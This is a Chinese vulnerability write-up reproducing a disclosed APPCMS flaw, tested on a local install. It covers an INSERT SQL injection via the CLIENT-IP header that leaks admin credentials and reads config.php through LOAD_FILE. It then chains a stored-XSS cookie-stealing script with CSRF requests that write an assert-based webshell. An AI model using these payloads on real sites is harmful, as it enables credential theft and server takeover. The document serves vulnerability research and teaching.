0x01 背景

由若水師傅提供的一個(gè)素材，想要復(fù)現(xiàn)CNVD上披露的一個(gè)APPCMS的漏洞，由CNVD上的描述可以知道存在漏洞的地方是comment.php這個(gè)文件，然后就沒(méi)有詳細(xì)的漏洞信息了，所以就需要分析相應(yīng)的源碼文件找出存在漏洞的點(diǎn)。借這個(gè)素材撿起下代碼審計(jì)的各種感覺(jué)。期待一起學(xué)習(xí)，期待和師傅們各種交流討論。

官方站點(diǎn)：http://www.appcms.cc/

漏洞詳情地址：

http://www.cnvd.org.cn/flaw/show/CNVD-2017-13891

0x02 審計(jì)過(guò)程

1. Thinking的心歷路程

本篇是個(gè)事后總結(jié)，是在審計(jì)過(guò)程中逐步思考利用，然后達(dá)到預(yù)期的目的。

先是進(jìn)行了代碼審計(jì)清楚了造成的漏洞的位置，開始先獲得了用戶名是admini，密文密碼：77e2edcc9b40441200e31dc57dbb8829，安全碼：123456；但是并無(wú)法得到后臺(tái)地址，經(jīng)過(guò)思考分析，便想到利用2次漏洞進(jìn)行XSS打到后臺(tái)地址和cookie，在深入些便是和CSRF結(jié)合得到shell，這便是我的心歷路程。以下先說(shuō)說(shuō)代碼審計(jì)部分。

(1)尋找漏洞位置

打開comment.php文件，通讀comment.php文件中的代碼，并跟蹤數(shù)據(jù)的傳遞過(guò)程。CNVD上說(shuō)的是一個(gè)SQL注入漏洞，所以可以先關(guān)注comment.php文件中涉及SQL操作的代碼。

comment.php文件第80行-86行，目測(cè)query_update,single_insert存在SQL操作，進(jìn)行SQL拼接的是TB_PREFIX，$fields['parent_id']和$fields。1.//comment.php文件第80行-86行

2. ? ?if ($fields['parent_id'] != 0) {

3. ? ? ? ?$ress = $dbm -> query_update("UPDATE " . TB_PREFIX . "comment SET son = son + 1 WHERE comment_id = '{$fields['parent_id']}'");

4. ? ?}

5. ? ?$res = $dbm -> single_insert(TB_PREFIX . 'comment', $fields);

其中TB_PREFIX在\core\config.conn.php進(jìn)行了define('TB_PREFIX', 'appcms_');定義，所以不用管TB_PREFIX。

$fields['parent_id']在第73行$fields['parent_id'] = $page['post']['parent_id'];if(!is_numeric($fields['parent_id'])) die();進(jìn)行了數(shù)據(jù)類型的判斷，所以也不能利用。

$fields是由自定義方法function m__add()創(chuàng)建的一個(gè)數(shù)組，再將$page數(shù)組中關(guān)鍵的信息賦給$fields，而$page擁有所有POST和GET的數(shù)據(jù)；

在 m__add()自定義方法中可控的數(shù)據(jù)$fields['id']，$fields['type']，$fields['parent_id']必須是數(shù)字類型，所以無(wú)法利用，剩下$fields['uname'] ,$fields['content'],$fields['ip'],后面經(jīng)過(guò)測(cè)試和數(shù)據(jù)跟蹤的過(guò)程$fields['ip']是一個(gè)可控制并可注入的點(diǎn)。1.//comment.php文件第29-30行

2.$page['get'] = $_GET; //get參數(shù)的 m 和 ajax 參數(shù)是默認(rèn)占用的，一個(gè)用來(lái)執(zhí)行動(dòng)作函數(shù)，一個(gè)用來(lái)判斷是否啟用模板還是直接輸出JSON格式數(shù)據(jù)

3.$page['post'] = $_POST;

1.//comment.php文件第57-86行

2.function m__add() {

3. ? ?global $page, $dbm, $c;

4.

5. ? ?$fields = array();

6. ? ?foreach($page['post'] as $key => $val) {

7. ? ? ? ?$page['post'][$key] = htmlspecialchars(helper :: escape($val));

8. ? ?}

9. ? ?if (empty($page['post']['comment'])) {

10. ? ? ? ?die('{"code":"1","msg":"發(fā)表內(nèi)容不能為空"}');

11. ? ?}

12. ? ?$code = md5(strtoupper($page['post']['code']));

13. ? ?if ($code != $_SESSION['feedback']) {

14. ? ? ? ?die('{"code":"140","msg":"驗(yàn)證碼錯(cuò)誤"}');

15. ? ?}

16. ? ?$fields['id'] = $page['post']['id'];if(!is_numeric($fields['id'])) die();

17. ? ?$fields['type'] = $page['post']['type'];if(!is_numeric($fields['type'])) die();

18. ? ?$fields['parent_id'] = $page['post']['parent_id'];if(!is_numeric($fields['parent_id'])) die();

19. ? ?$content = $c -> filter_words($page['post']['comment']);

20. ? ?$fields['content'] = helper :: utf8_substr($content, 0, 300);

21. ? ?$user = $c -> filter_words($page['post']['user'], 'user');

22. ? ?$fields['uname'] = helper :: utf8_substr($user, 0, 10);

23. ? ?$fields['date_add'] = time();

24. ? ?$fields['ip'] = helper :: getip();

25. ? ?if ($fields['parent_id'] != 0) {

26. ? ? ? ?$ress = $dbm -> query_update("UPDATE " . TB_PREFIX . "comment SET son = son + 1 WHERE comment_id = '{$fields['parent_id']}'");

27. ? ?}

28. ? ?$res = $dbm -> single_insert(TB_PREFIX . 'comment', $fields);

29. ? ?if (empty($res['error']) && empty($ress['error'])) die('{"code":"0","msg":"恭喜發(fā)表成功"}');

30. ? ?die('{"code":"1","msg":"發(fā)表失敗：' . $ress['error'] . '"}');

31.}

之所以得到如上的結(jié)論，第一個(gè)，是在跟進(jìn)single_insert方法的時(shí)候，在改方法中將$fields數(shù)組中的值使用foreach進(jìn)行組合后傳入$sql中沒(méi)有經(jīng)過(guò)任何處理。1.//core/database.class.php第102-120行代碼塊

2. public function single_insert($table_name, $fields) {

3. ? ? ? ?if (!is_array($fields) || count($fields) == 0) return array('sql' => '', 'error' => '插入失敗，插入字段為空', 'sql_time' => 0, 'autoid' => 0);

4.

5. ? ? ? ?$sql_field = "";

6. ? ? ? ?$sql_value = "";

7. ? ? ? ?// 遍歷字段和值

8. ? ? ? ?foreach($fields as $key => $value) {

9. ? ? ? ? ? ?$sql_field .= ",$key";

10. ? ? ? ? ? ?$sql_value .= ",'$value'";

11. ? ? ? ?}

第二個(gè)，跟進(jìn)$fields['ip'] = helper :: getip();的getip()方法，發(fā)現(xiàn)獲取的方式中有一項(xiàng)是CLIENT-IP，這種方式可以通過(guò)客戶端進(jìn)行IP偽造。1.//core/help.class.php文件的第47-57行

2. public static function getip() {

3. ? ? ? ?$onlineip = '';

4. ? ? ? ?if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {

5. ? ? ? ? ? ?$onlineip = getenv('HTTP_CLIENT_IP');

6. ? ? ? ?} elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {

7. ? ? ? ? ? ?$onlineip = getenv('REMOTE_ADDR');

8. ? ? ? ?} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {

9. ? ? ? ? ? ?$onlineip = $_SERVER['REMOTE_ADDR'];

10. ? ? ? ?}

11. ? ? ? ?return $onlineip;

12. ? ?}

因此$fields['ip']的值滿足用戶可控且數(shù)據(jù)未經(jīng)過(guò)安全處理直接拼接傳入SQL語(yǔ)句，造成了insert注入。為了方便查看和構(gòu)造payload，我在/core/database.class.php文件的single_insert方法的117行加入echo $sql;方便查看SQL語(yǔ)句，又由于這個(gè)CMS的存在失效的圖片驗(yàn)證，所以可以輕松的使用burpSuite進(jìn)行注入獲取數(shù)據(jù)。

(2)構(gòu)造payload獲取用戶名密碼

接下來(lái)構(gòu)造PAYLOAD，這個(gè)位置是insert注入但是并不會(huì)報(bào)SQL的錯(cuò)誤，所以無(wú)法使用報(bào)錯(cuò)注入，在師傅們的指導(dǎo)提醒下發(fā)現(xiàn)可以直接使用insert將注入查詢到的結(jié)果回顯到前臺(tái)中，由于這個(gè)是個(gè)評(píng)論功能，那么展示的位置是content,uname,date_add,ip這4個(gè)位置。

可以直接使用如下的語(yǔ)句將查詢結(jié)果插入到content和uname，然后回顯到前臺(tái)的用戶名和回復(fù)內(nèi)容位置。

PAYLOAD:

CLIENT-IP:10.10.10.1'),('1','0','0',(select upass from appcms_admin_list where uid= '1'),(select uname from appcms_admin_list where uid= '1'),'1510908798',1)#

(3)構(gòu)造payload獲取安全碼

此時(shí)就獲得到站點(diǎn)的用戶名和密碼，接下來(lái)要獲取安全碼，這里使用mysql的load_file()來(lái)讀取\core\config.php文件，安全碼等敏感信息就在該文件里面。

可以使用去掉payload后面的#導(dǎo)致報(bào)錯(cuò)等方式得到網(wǎng)站的絕對(duì)路徑，因?yàn)樵赲core\init.php中默認(rèn)開啟了錯(cuò)誤提示，所以可以利用錯(cuò)誤信息得到絕對(duì)路徑。

得到絕對(duì)路徑便可以使用load_file()去讀取\core\config.php文件中的安全碼了，但是這里content列是使用varchar，然后長(zhǎng)度是500，所以直接使用load_file()是無(wú)法獲得安全碼的，因此使用了substr進(jìn)行了截?cái)?#xff0c;截?cái)喾秶笾率?從480開始 然后截?cái)?00個(gè)字符長(zhǎng)度，此處沒(méi)有進(jìn)行了預(yù)測(cè)沒(méi)有精準(zhǔn)計(jì)算，但是已經(jīng)將安全碼寫到content列中了。

PAYLOAD:

CLIENT-IP:10.10.10.1'),('1','0','0',(SUBSTR(LOAD_FILE('D:\\soft\\phpStudy\\WWW\\APPCMS\\core\\config.php'), 480 , 400)),'thinking','1510908798',123456)#

此時(shí)已經(jīng)得到用戶名是admini，密文密碼：77e2edcc9b40441200e31dc57dbb8829，安全碼：123456；但是APPCMS安裝完畢后強(qiáng)制更改后臺(tái)地址，所以就是拿到這3個(gè)敏感信息也難以登錄后進(jìn)行其他操作。

2. Thinking的心歷路程

以上通過(guò)代碼審計(jì)已經(jīng)分析了CNVD上該版本的APPCMS漏洞產(chǎn)生的整個(gè)過(guò)程，接下來(lái)是對(duì)這個(gè)漏洞進(jìn)行進(jìn)階研究和學(xué)習(xí)。所先這種insert注入將用戶可控的數(shù)據(jù)直接寫到數(shù)據(jù)庫(kù)中，極大的可能還會(huì)造成2次漏洞，本小節(jié)利用insert注入直接進(jìn)行存儲(chǔ)型XSS打后臺(tái)，且使用CSRF在添加模塊的地方進(jìn)行寫馬操作。

(1)XSS注入測(cè)試

常規(guī)測(cè)試 忽略 :!)

(2)打COOKIE平臺(tái)

這里我使用的藍(lán)蓮花團(tuán)隊(duì)的xss平臺(tái)。

PAYLOAD構(gòu)造：

這里我對(duì)內(nèi)容進(jìn)行的修改添加了兩個(gè)請(qǐng)求，一個(gè)是創(chuàng)建文件的請(qǐng)求，一個(gè)是為文件添加內(nèi)容的請(qǐng)求。1.//獲取站點(diǎn)的關(guān)鍵信息

2.var website="http://127.0.0.1/xsser";

3.(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();

4.

5.function csrf_shell()

6.{

7.//創(chuàng)建文件名為evil.php的文件

8.var xmlhttp1=new XMLHttpRequest();

9.xmlhttp1.open("POST","./template.php?m=create_file",true);

10.xmlhttp1.setRequestHeader("Content-type","application/x-www-form-urlencoded");

11.xmlhttp1.send("filename=evil.php");

12.

13.//在evil.php文件中寫入一句話

14.var xmlhttp2=new XMLHttpRequest();

15.xmlhttp2.open("POST","./template.php?m=save_edit",true);

16.xmlhttp2.setRequestHeader("Content-type","application/x-www-form-urlencoded");

17.xmlhttp2.send("filename=evil.php&content=%3C%3Fphp+assert%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E");

18.};

19.csrf_shell();

(3)測(cè)試是否利用成功

配置好后進(jìn)行如下請(qǐng)求，此時(shí)后臺(tái)會(huì)生成一條評(píng)論記錄。

模擬管理員登錄后臺(tái)，使用burpload進(jìn)行跟蹤，發(fā)現(xiàn)創(chuàng)建了evil.php文件，并為文件寫入一句話，證明成功執(zhí)行了剛才配置好的腳本，然后還將站點(diǎn)的信息包括登錄信息等也發(fā)給了目標(biāo)系統(tǒng)。

此時(shí)便收到打回來(lái)的COOKIE信息了，而對(duì)對(duì)應(yīng)的shell地址便是http://127.0.0.1/APPCMS/templates/default/evil.php

0x03 小小總結(jié)

本篇獲取后臺(tái)的方法我就想到了XSS，本想使用報(bào)錯(cuò)的方式，但發(fā)現(xiàn)前臺(tái)并無(wú)數(shù)據(jù)和后臺(tái)進(jìn)行交互，所以沒(méi)想到怎么在前臺(tái)引發(fā)報(bào)錯(cuò)，報(bào)出后臺(tái)地址，所以就采用SQL注入，XSS，CSRF直接getShell了。如果師傅們有更好的思路期待討論交流，感謝若水師傅提供的素材，感謝各位師傅的指導(dǎo)。

總結(jié)

以上是生活随笔為你收集整理的php %3c%3c%3cxml 报错,代码审计| APPCMS SQL-XSS-CSRF-SHELL的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。